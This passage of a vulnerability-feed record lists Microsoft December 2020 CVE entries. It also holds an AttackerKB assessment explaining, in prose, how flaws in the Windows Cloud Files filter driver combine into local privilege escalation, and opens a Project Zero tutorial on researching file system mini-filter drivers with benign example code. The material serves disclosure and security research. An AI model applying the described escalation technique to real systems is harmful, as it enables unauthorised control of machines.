"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17097"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17097", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17097", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:23", "description": "Windows Network 
Connections Service Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Network Connections Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17092"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17092", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17092", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:24:21", "description": "Windows NTFS Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows NTFS Remote 
Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17096"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17096", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17096", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:24:21", "description": "Windows GDI+ Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows GDI+ Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], 
"modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17098", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17098", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:24:22", "description": "Hyper-V Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Hyper-V Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17095"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17095", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T20:11:25", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at December 15, 2020 7:34pm UTC reported:\n\nA nice little LPE technique which takes advantage of several issues as 
originally noted by James Forshaw at <https://bugs.chromium.org/p/project-zero/issues/detail?id=2082>. In particular, by running a program that communicates with the kernel via the `CfCreatePlaceholders` API, an attacker can exploit an issue within the cloud filter driver `cldflt.sys`, which runs in kernel mode, whereby placeholder files are not handled appropriately.\n\nAs James mentions within his writeup, several issues occur within `cldflt.sys` when creating placeholder files, which are described below:\n\n 1. The FSCTL control code which is sent to the kernel mode filter driver to instruct it to create the placeholder file will result in the filter driver calling `FltCreateFileEx()` without specifying the `IO_FORCE_ACCESS_CHECK` or `OBJ_FORCE_ACCESS_CHECK` flags to force access checks to occur. As calling `FltCreateFileEx()` effectively calls `IoCreateFileEx()` with the `IO_NO_PARAMETER_CHECKING` flag set. \n\n\nFor more details on these parameters see <https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocreatefile> which notes that if `IO_NO_PARAMETER_CHECKING` is used, the parameters are not probed to see if they reside in user mode memory or cause access violations. Looking at <https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes> also shows that the `OBJ_FORCE_ACCESS_CHECK` flag will enforce the permission checking of an object prior to using it even if the handle is being opened in kernel mode.\n\nSo effectively what is happening is that cause these flags are not being specified, the kernel is implicitly trusting the user\u2019s input and failing to perform appropriate access checks prior to performing the file operation in kernel mode on the user\u2019s behalf.\n\n 1. The cloud driver takes in a path which is split up into a base sync path, which is checked for write access, and a filename component, which isn\u2019t checked for path separators. 
So you can specify one base sync path but multiple path separators in the filename component and essentially trick Windows into thinking that you are writing to one directory that you have write access to, whereas in reality you are writing to a subdirectory of that directory that you might not normally have write access to (again remember that the access checks will be bypassed due to the write operation occurring with KeMode privileges).\n\n 2. Whilst the call to `FltCreateFileEx()` uses the `FILE_OPEN_REPARSE_POINT` to block directly accessing a reparse point, that only prevents it from attempting to access a mount point directly. If you instead create a subdirectory within the mount point and point it at that instead, it will still access the mount point, allowing you to write the file anywhere you would like.\n\nCombining this all together one can create an exploit that either a) Uses an existing directory that we have write permissions to, and then using the permission check error and the directory path error, we can write a file to one of the subdirectories we wouldn\u2019t normally have access to, or one can use the reparse point bug instead to write a file to anywhere on the system.\n\nMicrosoft patched this bug in December 2020 by changing the `HsmpOpCreatePlaceholders()` function in `cldflt.sys` to add additional checks. I have only done a preliminary inspection of this function but it appears that there are some new checks for the path, specifically r.e the use of `\\` characters, and a few jumps were changed in their logic. Unfortunately as the function is rather large at 190 blocks and I don\u2019t have the time to dive into this in depth right now this is as much as I was able to confirm. I also found that if you run the exploit on a patched system you will now get the error message: `System.Runtime.InteropServices.COMException (0x8007017C): The cloud operation is invalid. 
(Exception from HRESULT: 0x8007017C)`, which was not returned previously when attempting to run the PoC from James Forshaw.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-17136", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-02-22T00:00:00", "id": "AKB:33F83CEA-850A-43CD-8CA4-D0DC548F1958", "href": "https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-01-15T07:41:52", "description": "Posted by James Forshaw, Project Zero\n\nIn December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers ([CVE-2020-17103](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2086>), [CVE-2020-17134](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2084>), 
[CVE-2020-17136](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2082>), [CVE-2020-17139](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2088>)). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I\u2019ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.\n\nThe purpose of a file system filter driver according to [Microsoft](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/about-file-system-filter-drivers>) is:\n\n\u201cA file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.\u201d\n\nWhat this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.\n\nWith the issues being fixed I thought it would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I\u2019m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I\u2019ll also provide some basic example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.\n\nI\u2019m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. 
Also I\u2019m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let\u2019s start with an overview of how a filter driver works.\n\n## Filter Driver Implementation\n\nA filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.\n\n[](<https://1.bp.blogspot.com/-ft1Qb-E9rrA/X_9xlhIu_EI/AAAAAAAAaog/B0AV8WsW5wQrUX17mHfM11ku8zUik-7xwCNcBGAsYHQ/s653/Device%2BStack.png>)\n\nA filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.\n\n * Pass the IRP unmodified directly to the next driver in the stack.\n * Modify the IRP then pass to the next driver.\n * Modify the IRP response.\n * Complete the IRP operation with a success result.\n * Complete the IRP operation with an error result.\n * Pass the IRP to a different device stack.\n\nThis is the basics of how a filter driver works, the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations to filter requests. If it wants to inspect or modify the response it can register for the completion routine and handle the operation in the callback.\n\nIt\u2019s important to note that the IRP doesn\u2019t automatically propagate down the stack. A driver can choose to complete the IRP which means it\u2019ll not be processed by any other driver down the stack. 
If the driver passes on the IRP the driver must register a completion routine otherwise it\u2019ll not be notified when the IRP has been processed by the lower drivers in the stack. \n\nFor a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.\n\n## The Filter Manager and Mini-Filters\n\nImplementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don\u2019t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It\u2019s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.\n\nTo make it easier to write a filter driver Windows comes with the [Filter Manager Driver](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts#:~:text=The%20filter%20manager%20is%20a,in%20file%20system%20filter%20drivers.&text=The%20filter%20manager%20is%20installed,a%20minifilter%20driver%20is%20loaded.>) which takes care of handling IO requests and device stacks. This allows a developer to write what\u2019s called a mini-filter driver instead of a, now named, legacy filter driver. 
The following diagram shows how the architecture changes when you introduce the filter manager.\n\n[](<https://1.bp.blogspot.com/-4xN5FEYoyic/X_9xllA7a3I/AAAAAAAAaok/l8-pMXurJsAmRY6N-2yt_6kPNk9ZnvtXQCNcBGAsYHQ/s820/Mini-Filter%2BDriver.png>)\n\nAs you can see the mini-filters don\u2019t add their own device objects to the stack. Instead they are registered with the filter manager and it\u2019s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn\u2019t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.\n\nAnother useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making an IO request. When handling responses the altitudes are processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be [registered](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/minifilter-altitude-request>) with Microsoft. MSDN contains a [list of the currently registered altitudes](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes>). However, there\u2019s nothing to stop a driver from registering itself with a different altitude except it\u2019ll likely draw the ire of Microsoft and might fail certification. 
By formalizing the altitude values you avoid the risk that a filter driver\u2019s ordering may change depending on load order.\n\n## Mini-Filter Registration\n\nA mini-filter driver registers its presence by calling the [FltRegisterFilter](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltregisterfilter>) filter manager API, normally during the driver\u2019s entry point. The main parameter is a [FLT_REGISTRATION](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_registration>) structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).\n\nC:\\> fltmc\n\nFilter Name Num Instances Altitude Frame\n\n\\------------------------------ ------------- ------------ -----\n\nbindflt 1 409800 0\n\nWdFilter 17 328010 0\n\nstorqosflt 1 244000 0\n\nwcifs 0 189900 0\n\nCldFlt 0 180451 0\n\nFileCrypt 0 141100 0\n\nluafv 1 135000 0\n\nnpsvctrig 1 46000 0\n\nWof 14 40700 0\n\nFileInfo 17 40500 0 \n \n--- \n \nWe can see all the mini-filters registered, the number of instances which indicates the number of volumes that\u2019s been attached and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an [instance setup callback](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nc-fltkernel-pflt_instance_setup_callback>) to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. 
The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment. \n\nYou can view what volumes a filter is attached to using fltmc again:\n\nC:\\> fltmc instances -f luafv\n\nInstances for luafv filter:\n\nVolume Name Altitude Instance Name Frame VlStatus\n\n\\------------- ------------ ---------------------- ----- --------\n\nC: 135000 luafv 0 \n \n--- \n \nThis just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive then it\u2019s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands, we\u2019ll show an example of using these commands later.\n\nNOTE: Just because a filter driver is attached to a volume it doesn\u2019t mean it\u2019ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it\u2019ll only enable itself if there\u2019s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.\n\nMost mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.\n\n## Mini-Filter IO Request Operation Callbacks\n\nBy far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of [FLT_OPERATION_REGISTRATION](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_operation_registration>) structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn\u2019t need to specify both if it doesn\u2019t need both. 
The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.\n\nconst FLT_OPERATION_REGISTRATION Callbacks[] = {\n\n{ IRP_MJ_CREATE,\n\n0,\n\nPreCreateOperation,\n\nPostCreateOperation },\n\n{ IRP_MJ_OPERATION_END }\n\n}; \n \n--- \n \nA [pre-request callback](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nc-fltkernel-pflt_pre_operation_callback>) accepts three parameters:\n\n * The parameters for the operation, specified in a [FLT_CALLBACK_DATA](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_callback_data>) structure.\n * Related kernel objects, in a [FLT_RELATED_OBJECTS](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_related_objects>) structure.\n * An output pointer which can be assigned a callback context.\n\nThe prototype of the callback function pointer is:\n\ntypedef FLT_PREOP_CALLBACK_STATUS\n\n(*PFLT_PRE_OPERATION_CALLBACK) (\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID *CompletionContext\n\n); \n \n--- \n \nThe parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure\u2019s Iopb field which is an [FLT_IO_PARAMETER_BLOCK](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_io_parameter_block>) structure. The parameters are similar to the ones exposed through the IRP\u2019s current [IO_STACK_LOCATION](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_io_stack_location>) structure. 
The data parameter also contains the [IO_STATUS_BLOCK](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_io_status_block>) for the request and the caller\u2019s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:\n\nName | Value | Description \n---|---|--- \nFLT_PREOP_SUCCESS_WITH_CALLBACK | 0 | The callback was successful. Pass on the IO request and get a post-operation callback after completion. \nFLT_PREOP_SUCCESS_NO_CALLBACK | 1 | The callback was successful. Pass on the IO request. No callback required. \nFLT_PREOP_PENDING | 2 | Mark the IO operation as pending. \nFLT_PREOP_DISALLOW_FASTIO | 3 | If handling a Fast IO operation, fail it to force the operation as a normal IO Request. \nFLT_PREOP_COMPLETE | 4 | The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack. \nFLT_PREOP_SYNCHRONIZE | 5 | Synchronize the post-operation callback in the same thread. \nFLT_PREOP_DISALLOW_FSFILTER_IO | 6 | Disallow FastIO file creation. 
\n \nA [post-request callback](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nc-fltkernel-pflt_post_operation_callback>) accepts four parameters:\n\n * The parameters for the operation, specified in a [FLT_CALLBACK_DATA](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_callback_data>) structure.\n * Related kernel objects, in a [FLT_RELATED_OBJECTS](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_related_objects>) structure.\n * A context pointer which could have been assigned by the pre-operation callback.\n * Additional flags.\n\nFor post-operation callbacks the prototype is as follows:\n\ntypedef FLT_POSTOP_CALLBACK_STATUS\n\n(*PFLT_POST_OPERATION_CALLBACK) (\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID CompletionContext,\n\nFLT_POST_OPERATION_FLAGS Flags\n\n); \n \n--- \n \nThe parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.\n\nName | Value | Description \n---|---|--- \nFLT_POSTOP_FINISHED_PROCESSING | 0 | The callback was successful. No further processing required. \nFLT_POSTOP_MORE_PROCESSING_REQUIRED | 1 | Halts completion of the IO request. The operation will be pending until the filter driver completes it. \nFLT_POSTOP_DISALLOW_FSFILTER_IO | 2 | Disallow FastIO file creation. \n \n## Handling IO Requests\n\nNow that we\u2019ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. 
We\u2019ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you\u2019ll find in a driver but omit security checks and other unimportant details. This isn\u2019t Stack Overflow, so please don\u2019t copy and paste them into real drivers.\n\n### Pass the IO request unmodified\n\nThe simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we\u2019re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback. \n\nThe easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.\n\nTo give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn\u2019t contain the access then the request is completed with no callback.\n\nFLT_PREOP_CALLBACK_STATUS\n\nPreCreateOperation(\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID* CompletionContext\n\n) {\n\nPFLT_PARAMETERS ps = &Data->Iopb->Parameters;\n\nDWORD access = ps->Create.SecurityContext->DesiredAccess;\n\nif ((access & FILE_WRITE_DATA) == 0) {\n\nreturn FLT_PREOP_SUCCESS_NO_CALLBACK;\n\n}\n\n// Perform some operation...\n\n} \n \n--- \n \nThe example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.\n\nOf course depending on the purpose of the filter driver it might still want the post-operation callback to be called. 
For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.\n\nWhen the driver specified it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.\n\n### Modify the IO request\n\nDuring a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the [FltSetCallbackDataDirty](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltsetcallbackdatadirty>) API however all that currently does is set the flag.\n\n### Modify the IO request response\n\nAs with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I\u2019ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system had encountered a symbolic link. 
The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.\n\nFLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data,\n\nPUNICODE_STRING TargetFileName){\n\nLuafvSetEcp(Data, TargetFileName);\n\nPFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;\n\nExFreePool(FileObject->FileName.Buffer);\n\nFileObject->FileName.Buffer = ExAllocatePool(PagedPool,\n\nTargetFileName->Length);\n\nFileObject->FileName.MaximumLength = TargetFileName->Length;\n\nRtlCopyUnicodeString(&FileObject->FileName, TargetFileName);\n\nData->IoStatus.Information = 0;\n\nData->IoStatus.Status = STATUS_REPARSE;\n\nFltSetCallbackDataDirty(Data);\n\nreturn FLT_POSTOP_FINISHED_PROCESSING;\n\n} \n \n--- \n \nThe code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 an [IoReplaceFileObjectName](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ioreplacefileobjectname>) API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn\u2019t exist so it had to make do. An official Microsoft example can be found in the [SimRep sample driver](<https://github.com/microsoft/Windows-driver-samples/blob/master/filesys/miniFilter/simrep/simrep.c>).\n\nOne quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\\windows\\notepad.exe then FileName is set to \\windows\\notepad.exe. However, you can replace that with an absolute path such as \\??\\d:\\abc.txt and that still works. Also the driver doesn\u2019t need to create a real mount point or symbolic link reparse point buffer for this to work. 
The IO manager will just take the path from the file object and restart the create request with the new path.\n\n### Complete the IO request with a success result\n\nThe driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you\u2019re only updating the IO_STATUS_BLOCK you don\u2019t need to mark the data as dirty.\n\nHigher level filter drivers will still get their post-operation callbacks invoked if they\u2019re registered for them, however no lower altitude drivers will be called with the IO request.\n\n### Complete the IO request with an error result.\n\nThis is basically the same as for a success code, just specifying a different NT status. There\u2019s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success. \n\n### Pass the IO request to a different file or device stack\n\nThe filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they\u2019re not.\n\nThe most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.\n\nFirst, how can a filter driver interact with a file system volume it\u2019s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call [IoCreateFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocreatefile>) (and variants). 
